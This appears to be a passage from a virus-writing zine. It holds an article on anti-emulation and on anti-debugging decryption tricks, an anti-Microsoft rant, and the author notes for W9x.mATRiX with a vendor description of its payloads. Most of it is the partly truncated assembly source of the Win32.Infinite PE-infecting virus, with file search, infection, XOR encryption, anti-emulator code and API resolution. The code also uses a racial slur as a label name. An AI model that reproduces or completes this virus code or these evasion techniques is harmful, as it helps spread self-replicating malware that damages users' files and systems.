capable (just about) of using a computer. These are the people who will not
scan your file but simply add it to the ignore list, leaving it to go about
it's business.
Another method is the time wasted method. Again it's down to annoying the
user so much they don't bother scanning. If you can go round enough loops when
you find emulation that the scanner takes minutes just to scan one file, the
scanner will probably only be run overnight and taken off constant background
monitoring. That gives you a day to spread, and spread un-noticed.
Contact
----------
Microsoft are rumoured to have stated that they will use unlimited
resources and funds to find the author of the VBS/Monopoly worm. The worm
carries a message accusing Bill Gates of monopoly and includes a satirical
picture of Bill Gates' head on the Waddingtons character featured on a
monopoly board. This particular worm is much less of a security risk to the
user than other viruses. Surely everyone can see this is a case of bruised
millionaire's ego? Why does no-one point out to Bill that the worm spreads
through the almost unbelievable lack of security that Microsoft products
offer? Why not, Mr. Gates, use unlimited funds and resources to FIX your
defective products? Why not, Trading Standards, make him make his product do
what it claims to do, and while you're at it, make him either make it secure,
or make him warn people of the security risk? This is the worlds richest man,
who owns one of the worlds biggest companies, and that is how he got rich, by
writing a half-product and managing to sell it for a huge price. Money that
should have gone into making the products what they claimed to be went into
Bill's back pocket instead. We now have proof in this retaliation to a simple
worm that to Bill Gates, his ego is worth billions, his customers are not. The
virus didn't prove your guilt Bill, it didn't need to. Your reaction
leaves us in no doubt.
--==< An Introduction to Encryption, Part III >==--
First of all came the un-encrypted virus. Then came virus scanners, which
were basically just hex searchers looking for strings of hex only found in
certain viruses. Viruses retaliated by coming up with encryption. Most of the
virus is encrypted, and a small decryption engine at the start of the virus
decrypts the virus body. As the encryption changes each time, the virus
scanner is limited to searching for a much smaller section of code inside the
constant decryptor. This wasn't much of a problem for virus scanners though.
Viruses fought back again with polymorphism, this is essentially a way that a
virus can change it's decryptor every time it infects a new file. That way no
constant strings appear in the virus. Virus scanners came up with two ways to
combat this, heuristics and emulation. Heuristics is simply looking for code
that looks 'virus-like' This can be something as simple as the string '*.exe'.
Emulation is the controlled running of the program instruction by instruction
(not quite, but close enough for this article). A virus, under emulation, will
be allowed to run just enough to decrypt itself and reveal it's code for
either a straightforward scan or a generic (heuristic) scan. Anti-emulation is
the viruses way of defeating this, it is a basically a way to detect emulation
in progress and act accordingly. Some anti-emulation systems are incorporated
into the decryptor of a virus, so that if the virus is being emulated it will
not decrypt properly and hence not reveal it's code. Another defence the virus
can use is anti-debugging, which is designed to hinder people who try to debug
(in this case unencrypt) your code. This is different in that it doesn't
defend the virus from antivirus programs, it defends it from the antivirus
companies, the people who will try and study the virus and work out a way to
detect it. Anti-debugging can be very simple, like turning off the keyboard
interrupts at the start of the code and back on again at the end or it can be
quite complicated, with the actual anti-debugging routine also being used as a
key to decryption to protect against patching. This is the focus of this
article.
in al, 020h ; \
or al, 002h ; }Disable Keyboard interrupt
out 020h, al ; /
in al, 020h ; \
and al, 0FDh ; }Enable keyboard interrupt (FDh = NOT 2)
out 020h, al ; /
...at the end. When the virus is run under normal conditions, the keyboard
is only off for a very small time, too small for people to notice. If the
program is running under a debugger, as soon as the first few instructions are
run the keyboard will no longer work, leaving the person at the debugger with
no choice but to reset (at least it used to be in the good old days :) The
simple work around for the person debugging was too simply patch over the code
that turned off the keyboard with NOPs or other do-nothing instructions. Now
the virus would work as normal under a debugger, without disabling the
keyboard. To retaliate from this, the virus started to use it's anti-debugging
routine as a key for decryption. The hex string to turn off the keyboard is
'E4 20 0C 02 E6 20'. If this was one of the decryption keys, the person
debugging could not just replace the instructions with NOPs as this would
change the key to '90 90 90 90 90 90' and cause the virus to decrypt
incorrectly. This seems like an ideal solution, but unfortunately it is not.
The whole point of this article is to point out the following fact: Any
decryption routine can have it's basic functionality copied by someone
determined to debug it. This means that your routine that uses an
antidebugging routine and also uses that routine as a key for further
decryption could be useless. Let's go through it with an example. The original
virus looks like this:
start:
in al, 020h ; \
or al, 002h ; }Disable Keyboard interrupt
out 020h, al ; /
xor si,si
decrypt:
mov ax, word ptr [start+si]
xor [bx],ax
inc si
cmp si, offset decrypt
jne next_key_word
xor si,si
next_key_word:
loop decrypt
The pointer to the relevant word of the decryption key is kept in si, and
means that the key is all the code from 'start:' to 'decrypt:'. This works out
as 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'. If the keyboard
part was nopped out the key would change to '90 90 90 90 90 90 33 F6 BB 19 01
B9 36 01 2B CB D1 E9', as we've already seen. What the person doing the
debugging could do though, is simply take the encrypted portion of the virus
and put it into his own program, only this time the key would be stored as
data, not as an executable part of the program, like this:
start:
xor si,si
decrypt:
mov ax, word ptr [key+si]
xor [bx],ax
inc si
cmp si, offset key_end
jne next_key_word
xor si,si
next_key_word:
loop decrypt
key:
db 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'
key_end:
As you can see, the above will decrypt the encrypted section in exactly the
same manner, only because the key is stored as data we can change the code as
much as we like.
Conclusion
-------------
Contact
----------
Comments/questions/suggestions/bug reports/etc. are welcomed as always, as
long as it is kept reasonable.
- MidNyte
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Win32.Infinite (c) 2000 Billy Belcebu/iKX º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
virus_start:
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Virus code º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
infinite:
push eax ; Make some space on stack
pushad
call decrypt
encrypt_start = $
call get_delta
lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetWindowsDirectoryA
call SetDir&Infect
lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetSystemDirectoryA
call SetDir&Infect
lea edi,[ebp+current_dir-delta]
push edi
apicall SetCurrentDirectoryA
call Seek&Infect
; Now let's unprotect the memory where the epo bytes will be restored
RestoreSEH:
xor edx,edx ; Restore the original SEH
pop dword ptr fs:[edx]
pop edx
call over0
sebes db epo_bytes dup (90h)
over0: pop esi
push epo_bytes
pop ecx
rep movsb
popad
ret
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Mark of the virus º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Search for files to infect º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
SetDir&Infect:
lea edi,dword ptr [ebp+infect_dir-delta]
push edi
apicall SetCurrentDirectoryA
Seek&Infect:
lea eax,[ebp+WFD-delta] ; Search for files
push eax
call over3
db "*.*",0 ; Search for all files
over3: apicall FindFirstFileA
inc eax
jz FailOccured
SearchForMore:
push dword ptr [ebp+modbase-delta] ; Preserve untouchable info
push dword ptr [ebp+rethost-delta]
call InfectPE
NotThisTime:
pop dword ptr [ebp+rethost-delta] ; Restore this interesting
pop dword ptr [ebp+modbase-delta] ; info
CloseSearchHandle:
push dword ptr [ebp+SearchHandle-delta]
apicall FindClose
FailOccured:
ret
ProcessExtension:
; input:
; EDI - Pointer to file name
; output:
; ECX - NULL if it is not an extension; 1 if it is.
dec edx
ItWasExtension:
inc edx
mov ecx,edx
ret
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º PE Infection Engine º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
InfectPE:
; input:
; EDI - Pointer to filename to infect
; output:
; Nothing.
NotInWin2k:
push 80h ; Destroy hostile attributes
push edi ; and put normal ones
apicall SetFileAttributesA
inc eax
jz ExitInfectPE
dec eax
push 00h
push eax
apicall GetFileSize ; Get its size
mov dword ptr [ebp+OriginalSize-delta],eax
or eax,eax
jz CloseFileExitInfectPE
xor ebx,ebx
push 00h ; We want map only file size
push ebx
push ebx
push 02h
push eax
apicall MapViewOfFile
or eax,eax
jz UnMap&CloseMap&FileExitInfectPE
mov edi,esi
add esi,0F8h-28h ; Pointer to 1st section-28h
nigger: add esi,28h ; Ptr to section name ;)
mov edx,eax ; Put in EDX the original EIP
sub edx,[esi.VirtualAddress] ; Remove the VirtualAddress
cmp edx,[esi.VirtualSize] ; Is EIP pointing to this sec?
jae nigger ; If not, loop again
pushad
push dword ptr [esi.SizeOfRawData] ; Some tricky thing :)
pop dword ptr [esi.VirtualSize]
mov eax,[ebp+rethost-delta]
add eax,ebx
mov dword ptr [ebp+tempshit-delta],eax
popad
add ebx,[esi.PtrToRawData]
add edx,ebx
mov esi,edx ; ESI - Pointer to section
mov dword ptr [ebp+EPofs-delta],esi ; mapped in mem where da EP is.
pushad
sub eax,dword ptr [ebp+MapAddress-delta]
mov esi,dword ptr [ebp+PtrPEH-delta]
mov edi,esi ; We wanna put some attribs
add esi,0F8h-28h ; to the section where the
niggr2: add esi,28h ; virus code is located, so
mov edx,eax ; we've to search for it :)
sub edx,[esi.VirtualAddress]
cmp edx,[esi.VirtualSize]
jae niggr2
; Let's check if we can put ourselves inside the hole (more security)
mov edx,[esi.VirtualAddress]
add edx,[esi.VirtualSize]
add eax,((heap_end-virus_start)+security)
sub edx,eax
js wecantinfectthere
mov dword ptr [ebp+inf_switch-delta],01h
or [esi.Characteristics],0A0000020h ; PUT IT SUCKA!
wecantinfectthere:
popad
mov ecx,12345678h
org $-4
inf_switch dd ?
or ecx,ecx
jz Trunc&UnMap&CloseMap&FileExitInfectPE
lea esi,[ebp+virus_start-delta]
mov edi,eax
add edi,security ; Some security :)
pushad
mov eax,12345678h ; Let's calculate where the
tempshit = $-4 ; jmp must point to
add eax,(killemu-epo)
sub edi,eax
mov dword ptr [ebp+jmpadd-delta],edi
popad
mov ecx,virus_size
rep movsb
pushad
sub edi,virus_end-encrypt_start
mov esi,edi
call random
mov bl,al
mov byte ptr [edi+enc_key-encrypt_start],bl
mov byte ptr [ebp+enc_k3y-delta],bl
mov ecx,encrypt_end-encrypt_start
enc_l00p:
lodsb
xor al,bl
stosb
loop enc_l00p
popad
pushad
sub edi,(virus_size-(sebes-virus_start))
mov esi,dword ptr [ebp+EPofs-delta]
push epo_bytes
pop ecx
pushad
lewpit:
lodsb ; Store EPO bytes also
xor al,00h ; encrypted
enc_k3y = $-1
stosb
loop lewpit
popad
xchg edi,esi
call over69
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
epo: call killemu ;³ This code will give the control to the
mov esp,[esp+08h] ;³ virus and avoid the scanning of emulators
xor edx,edx ;³ at the same time :)
pop dword ptr fs:[edx];³
pop edx ;³
db 0E9h ;³
jmpadd: dd ? ;³
killemu:xor edx,edx ;³
push dword ptr fs:[edx];³
mov fs:[edx],esp ;³
div edx ;³
epo_bytes = $-epo ;³
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
rep movsb
popad
add esi,58h
cmp dword ptr [esi],00h
jz Trunc&UnMap&CloseMap&FileExitInfectPE
ThereWasNoHole:
Trunc&UnMap&CloseMap&FileExitInfectPE:
UnMap&CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapAddress-delta]
apicall UnmapViewOfFile
CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapHandle-delta]
apicall CloseHandle
CloseFileExitInfectPE:
push dword ptr [ebp+FileHandle-delta]
apicall CloseHandle
ExitInfectPE:
ret
SeekForHoles:
; input:
; ESI - Pointer inside file (in PE header)
; ECX - How many space do we need
; EBX - Search limit
; output:
; EAX - Pointer to the beginning of the shit
; CF - Set if error (couldn't find hole)
call SetSEH1
mov esp,[esp+08h] ; Just for security of
call get_delta ; scanning :)
jmp NSE_
SetSEH1:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp
push esi
GetAnotherByte:
xor edx,edx ; Clear counter :)
GAB2: dec ebx ; Check if we arrived until
jz NoShitEnough ; the limit (run away if so)
lodsb
or al,al ; NULL byte?
jz IsFillByte
cmp al,0CCh ; Int 3? (VC6 filez're full
jnz GetAnotherByte ; of them)
IsFillByte:
inc edx ; Increase counter
cmp ecx,edx
jnz GAB2
WeFoundManyShit:
sub esi,ecx ; ESI = Point to shit
xchg eax,esi
pop esi
pop dword ptr fs:[00h]
pop edx
ret
NoShitEnough:
pop esi
NSE_: stc
pop dword ptr fs:[00h]
pop edx
ret
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º APICRC32 Search Engine º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
GetAPIs proc
; input:
; EAX - Base address of the library where search the APIs
; ESI - Pointer to an array of CRC32 of the APIs we want to search
; EDI - Pointer to where store the APIs
; output:
; Nothing.
pop eax
jmp GetAPIs
EndOfAPISearch:
ret
GetAPIs endp
GetAPI_ET_CRC32 proc
; input:
; EAX - CRC32 of the API we want to know its address
; output:
; EAX - API address, NULL if error
xor edx,edx
pushad
call over_APICRC32_SEH
mov esp,[esp+08h] ; Set stack as before
xor eax,eax ; signalize the error
jmp Remove_APICRC32_SEH
over_APICRC32_SEH:
push dword ptr fs:[edx] ; Set new SEH frame
mov dword ptr fs:[edx],esp
push 1Ch
pop esi
add esi,[eax+78h] ; Get a pointer to its edata
add esi,[ebp+TmpModuleBase-delta]
Remove_APICRC32_SEH:
xor edx,edx ; Remove that SEH frame
pop dword ptr fs:[edx]
pop edx
mov [esp.1Ch],eax
popad
ret
GetAPI_ET_CRC32 endp
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Subroutines º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
CRC32:
; input:
; ESI - Pointer to the data to process
; EDI - Size of such data
; output:
; EAX - CRC32 of that data
cld
pushad
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
not edx
not ecx
xchg eax,edx
rol eax,10h
mov ax,cx
mov [esp.PUSHAD_EAX],eax
popad
ret
CheckImageBase:
; input:
; ESI - Address inside module
; ECX - Limit
; output:
; ESI - module address
and esi,0FFFF0000h
cmp word ptr [esi],"ZM"
jz ItWasKewlEnough
NotCoolAddress:
sub esi,00010000h
loop CheckImageBase
ItWasKewlEnough:
ret
random:
; input:
; Nothing.
; output:
; EAX - Random number
apicall GetTickCount
xor eax,12345678h
org $-4
seed dd -1
mov dword ptr [ebp+seed-delta],eax
ret
get_delta:
call delta ; Get a relative address from
delta: pop ebp ; when calculate offsets
ret
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Virus Data º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
api_list = $
; db "KERNEL32",0 ; Don't needed
@VirtualProtect dd 079C3D4BBh
@FindFirstFileA dd 0AE17EBEFh
@FindNextFileA dd 0AA700106h
@FindClose dd 0C200BE21h
@CreateFileA dd 08C892DDFh
@SetFileAttributesA dd 03C19E536h
@CloseHandle dd 068624A9Dh
@GetCurrentDirectoryA dd 0EBC6C18Bh
@SetCurrentDirectoryA dd 0B2DBD7DCh
@GetWindowsDirectoryA dd 0FE248274h
@GetSystemDirectoryA dd 0593AE7CEh
@CreateFileMappingA dd 096B2D96Ch
@MapViewOfFile dd 0797B49ECh
@UnmapViewOfFile dd 094524B42h
@SetEndOfFile dd 059994ED6h
@GetFileSize dd 0EF7D811Bh
@SetFilePointer dd 085859D42h
@GetSystemTime dd 075B7EBE8h
@LoadLibraryA dd 04134D1ADh
@FreeLibrary dd 0AFDF191Fh
@GlobalAlloc dd 083A353C3h
@GlobalFree dd 05CDF6B6Ah
@WriteFile dd 021777793h
@GetProcAddress dd 0FFC97C1Fh
@GetTickCount dd 0613FD7BAh
db 0BBh
db "IMAGEHLP",0
@CheckSumMappedFile dd 078B31744h
db 0BBh
db "SFC",0
@SfcIsFileProtected dd 06DE8F7ABh
db 0BBh
db "DC4"
encrypt_end = $
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Simple decryption l00p :) º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
decrypt:
pop esi
mov edi,esi
mov ecx,encrypt_end-encrypt_start
mov bl,00h
enc_key = $-1
dec_l00p:
lodsb
xor al,bl
stosb
loop dec_l00p
jmp encrypt_start
virus_end = $
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Virus Data in the heap º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
kernel dd ?
TmpModuleBase dd ?
AddressTableVA dd ?
NameTableVA dd ?
OrdinalTableVA dd ?
OriginalSize dd ?
SearchHandle dd ?
FileHandle dd ?
MapHandle dd ?
MapAddress dd ?
PtrPEH dd ?
EPofs dd ?
api_addresses = $
; KERNEL32 APIs
VirtualProtect dd ?
FindFirstFileA dd ?
FindNextFileA dd ?
FindClose dd ?
CreateFileA dd ?
SetFileAttributesA dd ?
CloseHandle dd ?
GetCurrentDirectoryA dd ?
SetCurrentDirectoryA dd ?
GetWindowsDirectoryA dd ?
GetSystemDirectoryA dd ?
CreateFileMappingA dd ?
MapViewOfFile dd ?
UnmapViewOfFile dd ?
SetEndOfFile dd ?
GetFileSize dd ?
SetFilePointer dd ?
GetSystemTime dd ?
LoadLibraryA dd ?
FreeLibrary dd ?
GlobalAlloc dd ?
GlobalFree dd ?
WriteFile dd ?
GetProcAddress dd ?
GetTickCount dd ?
; IMAGEHLP APIs
CheckSumMappedFile dd ?
; SFC APIs
SfcIsFileProtected dd ?
; Other datas
virseg ends
end infinite
;****************************************************************************
;** This is the include file for the constant and macros of the virus **
;****************************************************************************
; Constants
virus_size = virus_end-virus_start
total_size = heap_end-virus_start
inf_mark = "AIAG"
PUSHAD_EDI = 00h
PUSHAD_ESI = 04h
PUSHAD_EBP = 08h
PUSHAD_ESP = 0Ch
PUSHAD_EBX = 10h
PUSHAD_EDX = 14h
PUSHAD_ECX = 18h
PUSHAD_EAX = 1Ch
MagicPE = 00h
Machine = 04h
NumberOfSections= 06h
EntrypointRVA = 28h
CodeRVA = 2Ch
FileAlignment = 3Ch
MagicInfection = 4Ch
SizeOfImage = 50h
CheckSum = 58h
PECharacteristics= 5Eh
DirEntryReloc = 0A0h
SectionName = 00h
VirtualSize = 08h
VirtualAddress = 0Ch
SizeOfRawData = 10h
PtrToRawData = 14h
PtrToReloc = 18h
NumOfReloc = 20h
Characteristics = 24h
; Macros
; Structures
WIN32_FIND_DATA struc
dwFileAttributes dd ?
ftCreationTime dq ?
ftLastAccessTime dq ?
ftLastWriteTime dq ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
szFileName db 260 dup (?)
szAlternateFileName db 13 dup (?)
db 03 dup (?)
WIN32_FIND_DATA ends
;****************************************************************************
;** This is the host for the first generation **
;****************************************************************************
.586p
.model flat,stdcall
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
szTtl db "Win32.Infinite",0
szMsg db "Size "
db virus_size/1000 mod 10 + "0"
db virus_size/0100 mod 10 + "0"
db virus_size/0010 mod 10 + "0"
db virus_size/0001 mod 10 + "0"
db " - "
db "Virtual "
db total_size/1000 mod 10 + "0"
db total_size/0100 mod 10 + "0"
db total_size/0010 mod 10 + "0"
db total_size/0001 mod 10 + "0"
db 10,"(c) 2000 Billy Belcebu/iKX",0
_DATA ends
virus_init proc
jmp virus_start
host:
db epo_bytes dup (90h)
call MessageBoxA,0,offset szMsg,offset szTtl,0
call ExitProcess,0
virus_init endp
_TEXT ends
;comment ÿ
;
;released
;
;ú ÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú
; ÜÜÜÜÜ °
; ÛÛÛÛ ° ßßßß ÛÛÛÛßÛÛÛ ÛÛÛÛßÛÛÛÛ ÛÛÛÛ ÛÛÛÛþßßßß ÛÛÛÛßÛÛÛÛ ÛÛÛÛßÛÛÛÛ2000
; ° ²ÛÛÛ ° ÛÛÛÛ ²ÛÛÛÜ ° ÛÛÛÛþ ÛÛÛÛ ° ²ÛÛÛ ÛÛÛÛ ÛÛÛÛ ° ²ÛÛÛþ °
;°°°°²ÛÛÛ°ÛÛÛÛ°²ÛÛÛ°ÛÛÛÛ°°°°°ÛÛÛÛ°ÛÛÛÛ°²ÛÛÛ°Û°ÛÛÛÛ°²ÛÛÛ°²ÛÛÛ°°°°°°²ÛÛÛ°ÛÛÛÛ° °°
; ° ²ÛÛÛÜÛÛÛÛܲÛÛÛ ²ÛÛÛ ° ²ÛÛÛÜÛÛÛÛ ²ÛÛÛÜÛÜÛÛÛÛ ²²ÛÛܲÛÛÛ ° °²ÛÛÛÜÛÛÛÛ[LW]
; ßßßßßßß °
; W9x.mATRiX.size by LiFEwiRE [ShadowVX] - www.shadowvx.org
;
;
; Intro
;
; This virus is my first windows virus, and the result of reading some
; docs, tutorial and (Ring0 virus)-sources.
;
; It is not a very complicated virus, and it doesn't use new technics
; too... Maybe the ASCII counter is some unusual feature.
;
; When debugging is enabled, this things are extra:
;
; Unload when dword at bff70400 <> 0h
; Beep at certain events (get resident, unload & infect)
; Beep can be turned off by changing byte ptr at bff70408 <> 0h
; only infects files at your D: drive (it's my test drive)
;
; I use WinIce to modify the values.
;
; Specs:
;
; Ring0 resident, infects on IFSmgr file rename, open and attrib, EXE,
; SCR and COM (!) files. Com files are infected for the payload, a scene
; from The Matrix. The COM files are not really infected, but some date
; checking code and action is appended on it. When the month is equal
; to the date the payload will start.
;
; Infection : Increasing last section, and make a jump at orignal
; entrypoint to it (when modifying EP to last section
; AVPM will popup:( )
;
; Encryption : XOR'd and polymorfic-build-up-decryptors.
; Armour : Anti debugger & anti emulator (SEH & Anti-SoftICE)
;
; Payload(s) : 2, as i said above 1 which is appended to all .com files
; on opening and c:\windows\win.com which will display
; 'Wake up Neo... / The Matrix has you... / w9x.mATRiX'
; like in the movie (except the last sentence, w9x.mATRiX:)
; when the day is equal to the month (1 jan, 2 feb,etc.)
;
; the other payload will remove the shutdown command from
; the start menu using the registery - at 06 april.
;
; KnownBugs : No I know... I tested this code a lot, and a friend of me
; : infected his own PC accidently and it worked really good
; :)... The only problem is that F-prot hangs on infected
; files... hehe but that's not my problem :)
;
; Thanx to : Lord Julus, Billy Belcebu & Z0MBiE.
;
; Greets to : Ruzz', Kamaileon, z3r0, Bhunji, Dageshi, all other Shadow-
; VX members,
; r-, GigaByte, VirusBuster, CyberYoda, T00fic, all other
; people i met on #virus & #vir, and 29A & iKX for their
; nice magazines.
;
; and some non-virus greets:
;
; Ghostie :P, Hampy, nog wat XXXClan'ers, DJ Accelerator,
; King Smozzeboss SMOS from Conehead SMOS games [NL1SMS]
; PiepPiep, NL0JBL, BlueLIVE, MisterE & Xistence.
;
; Compile: Tasm32 /m3 /ml LiFEwiRE.ASM,
; tlink32 /Tpe /aa /c LiFEwiRE.OBJ,,,import32.lib
; pewrsec LiFEwiRE.EXE
;
; Contact: Lifewire@mail.ru
;
;
;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ÿ
;
;Description at www.viruslist.com
;
;Win95.Matrix
;
;
;It is not a dangerous memory resident polymorphic parasitic Win9x virus. It
;stays in the Windows memory as a device driver (VxD) by switching from
;application mode to Windows kernel (Ring3->Ring0), hooks disk files access
;functions, and infect PE executable files with EXE and SCR file name
;extensions, and affects DOS COM files.
;
;While infecting a PE EXE file the virus encrypts itself and writes to the
;file end. The virus also patches program's startup code with a short routine
;that passes control to main virus code.
;
;While affecting DOS COM files the virus writes to the end of file a short
;routine that has no infection abilities, but just displays a message on
;July 7th:
;
; Wake up, Neo...
; The Matrix has you...
; w9x.mATRiX
;
;The virus also affects the C:\WINDOWS\WIN.COM file in the same way.
;
;On April 6th the virus modifies the system registry key:
;
;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer NoClose = 1
;
;As the result of this key a user cannot switch off the computer.
;
;The virus also deletes anti-virus data files: AVP.CRC, ANTI-VIR.DAT, IVB.NTZ,
;CHKLIST.MS.
;
;The virus contains the text strings:
;
;[- comment from LiFEwiRE- AV'ers forgot to put the strings here??]
;
;where 'xxxxxxx' is the virus' "generation" number.
;
;
